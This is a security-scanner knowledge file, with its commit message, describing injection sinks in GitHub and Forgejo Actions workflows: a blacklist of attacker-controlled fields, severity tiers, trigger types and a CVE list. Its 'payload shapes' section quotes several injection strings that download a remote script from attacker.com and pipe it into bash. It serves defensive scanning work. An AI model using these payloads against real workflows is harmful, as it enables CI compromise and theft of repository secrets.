ktg-plugin-marketplace/plugins/llm-security/knowledge/workflow-injection-patterns.md
Kjell Tore Guttormsen c31d4b1718 feat(workflow-scanner): E11 part 1 — core file-walk + 23-field blacklist + sink-restriction
Adds a deterministic GitHub Actions / Forgejo Actions injection
scanner. Detects \${{ <dangerous-field> }} interpolations inside
\`run:\` step blocks under privileged or semi-privileged triggers.
Sink-restricted: \`if:\` / \`with:\` / \`env:\` (block-level) are
evaluated by the runner expression engine, not the shell, so they
are NOT injection sinks and are suppressed at parser level.

Why: workflow expression injection is the most prevalent SAST class
on GitHub (CodeQL preview: 800K+ findings across 158K repos). The
graduated severity matrix (HIGH for pull_request_target / discussion
/ workflow_run; MEDIUM for pull_request / workflow_dispatch) is the
community-converged calibration target — uniform HIGH causes alert
fatigue.

Components:
- scanners/lib/workflow-yaml-state.mjs — line-based YAML state
  machine. Tracks indentation, parent-context stack, and
  \`run: |\` / \`run: >\` block-scalar entry/exit. Zero deps.
- scanners/workflow-scanner.mjs — discoverWorkflows() probes
  .github/workflows/ and .forgejo/workflows/ directly (file-discovery
  has no glob include). 23-field blacklist (GHSL 17 + 6 GlueStack-
  class additions). Platform encoded via file path; no schema
  extension to finding(). Forgejo-specific: workflow_run advisory
  emitted to stderr; recommendation text mentions Forgejo's
  server-level token scoping (job-level permissions: is ignored).
- knowledge/workflow-injection-patterns.md — 23-field blacklist,
  trigger taxonomy, severity matrix, Forgejo divergences, NVD CVE
  corpus.

Tests (47 new):
- tests/lib/workflow-yaml-state.test.mjs (15): trigger forms
  (string / inline-list / block-list / block-mapping), single-line
  run, block-scalar | and > tracking, env/with sink-mismatch,
  multi-line, comment stripping, line-number accuracy.
- tests/scanners/workflow-scanner.test.mjs (14): TP head_ref
  pull_request_target, TP discussion.title gluestack pattern,
  TP comment.body pull_request, TP issue.body block-scalar,
  FP if-context, FP env-block, INFO numeric, Forgejo TP, Forgejo
  workflow_run advisory, envelope shape, WFL prefix.
- 9 fixtures in tests/fixtures/workflows/{.github,.forgejo}/workflows/.

Out of scope (B4 / Batch D):
- Re-interpolation detection (env.VAR after env: from blacklisted source)
- github.actor authorization-bypass category
- WFL prefix in severity.mjs OWASP maps + scan-orchestrator
  registration (B4)
- Composite-action input tracing, GITHUB_ENV poisoning (Batch D)

Test count: 1685 → 1732 (+47). Pre-compact-scan flake unchanged
(passes in isolation).
2026-04-30 15:48:48 +02:00

161 lines
7.1 KiB
Markdown

# Workflow Injection Patterns (E11)
Knowledge file for `scanners/workflow-scanner.mjs`. Covers GitHub
Actions and Forgejo Actions `${{ <expr> }}` injection sinks inside
`run:` step blocks. Sourced from
`.claude/projects/2026-04-29-batch-c-scope-finalize/research/01-github-forgejo-actions-injection.md`
(confidence 0.92, 51 sources).
## Canonical 23-field blacklist
The community has converged on a blacklist (zizmor #1878) rather than a
whitelist of safe fields. The 23 fields below are the v7.3.0 baseline —
GitHub Security Lab's canonical 17-field list plus 6 GlueStack-class
additions. All patterns match both `github.*` and `forgejo.*` prefixes
(Forgejo aliases `github.*` to `forgejo.*` per its Reference docs).
### GHSL canonical 17
```
github.event.issue.title
github.event.issue.body
github.event.pull_request.title
github.event.pull_request.body
github.event.pull_request.head.ref
github.event.pull_request.head.label
github.event.pull_request.head.repo.default_branch
github.event.comment.body
github.event.review.body
github.event.commits.*.message
github.event.commits.*.author.email
github.event.commits.*.author.name
github.event.head_commit.message
github.event.head_commit.author.email
github.event.head_commit.author.name
github.event.pages.*.page_name
github.head_ref
```
### GlueStack-class additions (v7.3.0)
```
github.event.discussion.title # CVE-2025-53104
github.event.discussion.body # CVE-2025-53104
github.event.discussion.user.login # CVE-2025-53104
github.event.inputs.* # workflow_dispatch — string inputs only
github.event.client_payload.* # repository_dispatch
inputs.* # bare `inputs.<name>` (action-side / reusable workflow)
```
## Severity matrix
| Tier | Field class | Trigger context | Severity |
|------|-------------|-----------------|----------|
| Privileged trigger | dangerous | `pull_request_target`, `issue_comment`, `discussion`, `discussion_comment`, `workflow_run` | HIGH |
| Semi-privileged trigger | dangerous | `pull_request`, `workflow_dispatch`, `repository_dispatch` | MEDIUM |
| Other / no trigger info | dangerous | (default fallback) | MEDIUM |
| Numeric / hex / fixed-string | safe | any | INFO (suppressed in summary) |
| Sink mismatch | (any) | `if:`, `with:`, `env:` (block-level), `name:`, `runs-on:`, `timeout-minutes:` | NOT injection — suppressed at parser level |
### Safe fields (INFO-only, never injection sinks)
```
github.event.pull_request.number # integer
github.event.pull_request.head.sha # 40-char hex
github.run_id # server-assigned int
github.run_number # int
github.sha # 40-char hex
github.event.action # fixed string ("opened" / "closed" / …)
github.event.repository.full_name # admin-controlled
```
## Trigger taxonomy
### Privileged (HIGH-severity matrix)
- `pull_request_target` — runs on the BASE repo, has write tokens. The
canonical "pwn-request" trigger.
- `issue_comment` — fires on any new issue/PR comment. Attacker-supplied
`comment.body` is shell-injectable.
- `discussion` and `discussion_comment` — same shape as `issue_comment`,
but the Discussion fields evade older zizmor whitelists. CVE-2025-53104
(gluestack) used `${{ github.event.discussion.title }}`.
- `workflow_run` — chained workflow trigger. Inherits BASE repo
privileges. NOT documented for Forgejo Actions; Forgejo scans treat
it as privileged for severity but emit a stderr advisory.
### Semi-privileged (MEDIUM-severity matrix)
- `pull_request` — read-only token from forks; still injectable, just
less catastrophic.
- `workflow_dispatch` — manual trigger with string `inputs.*`; CVE-2026-35580
(NSA Emissary) used this.
- `repository_dispatch` — webhook-driven trigger with `client_payload.*`.
## Sink restriction
Only `run:` step content (single-line or block-scalar `|` / `>`) is a
shell injection sink. The runner expression engine evaluates expressions
inside:
- `if:` — boolean evaluation, no shell. (actionlint #443.)
- `with:` — passed to action input; downstream action's responsibility.
- `env:` (any level) — bound to env var; safe IF consumed via `$VAR` in
the run script. Re-interpolation `${{ env.VAR }}` inside `run:`
cancels the mitigation (Appsmith CVE GHSL-2024-277).
The scanner suppresses findings whose parent is one of these contexts.
The re-interpolation pattern is detected separately in B4.
## Forgejo divergences
| Item | GitHub | Forgejo | Scanner implication |
|------|--------|---------|---------------------|
| Primary context | `github.*` | `forgejo.*` (alias `github.*`) | Match both prefixes |
| Job-level `permissions:` | Enforced | **Ignored** | Recommendation text mentions Forgejo's server-level token scoping instead |
| `workflow_run` trigger | Supported | **Likely unsupported** | Stderr advisory emitted; severity logic still applies |
| OIDC | `permissions: id-token: write` | `enable-openid-connect` | Out of scope for E11 |
The scanner detects platform from file path (`.forgejo/workflows/`
forgejo, `.github/workflows/` → github). Both directories are scanned
independently when both exist; there is no fallback from one to the
other (documented design choice — the v7.3.0 plan locked this in to
avoid over-confident mitigation guidance for Forgejo).
## Real-world payload shapes (v7.3.0 reference)
- **`${IFS}` brace-expansion** (Ultralytics CVE-2024):
`openimbot:$({curl,-sSfL,raw...}${IFS}|${IFS}bash)`
- **Quote-break + curl** (ultralytics GHSA-7x29-qqmq-v6qc):
`Hacked";{curl,-sSfL,gist...}${IFS}|${IFS}bash`
- **Discussion title `$()` substitution** (gluestack CVE-2025-53104):
`$(curl -sSfL attacker.com/exfil.sh | bash)`
- **`workflow_dispatch` shell-break** (Emissary CVE-2026-35580):
`1.0.0"; curl attacker.com/backdoor.sh | bash; echo "`
Single-quote shell escaping provides ZERO protection — template
substitution happens BEFORE shell parsing (Ken Muse, Appsmith CVE).
## Confirmed CVE corpus (NVD / vendor-confirmed)
- CVE-2023-49291 — tj-actions/branch-names ≤7.0.6 (HIGH 9.3)
- CVE-2025-30066 — tj-actions/changed-files (HIGH 8.6, **CISA KEV**)
- CVE-2025-30154 — reviewdog/action-setup v1 (HIGH 8.6, **CISA KEV**)
- CVE-2025-53104 — gluestack-ui (CRITICAL 9.1, Discussion vector)
- CVE-2025-61671 — Microsoft Symphony (CRITICAL 9.3)
- CVE-2026-33475 — langflow-ai/langflow (CRITICAL 9.1)
- CVE-2026-35580 — NSA Emissary (CRITICAL 9.x, April 2026)
- CVE-2026-3854 — GitHub.com / GHES ≤3.19.2 platform-level (HIGH 8.7)
The April 2026 `elementary-data` PyPI compromise (Gemini second opinion)
is on a watch-list pending NVD/StepSecurity confirmation.
## Out of scope (deferred to Batch D / v8.0.0)
- Composite-action input tracing
- Reusable-workflow call analysis
- `GITHUB_ENV` poisoning detection (LegitSecurity, CodeQL `actions-envvar-injection-critical`)
- Zombie-workflow scanning across non-default branches
- IssueOps TOCTOU (SHA at comment time vs review time)
- Authorization-bypass class for `github.actor` checks (Synacktiv 2023
Dependabot spoofing) — added in B4 as a separate finding category.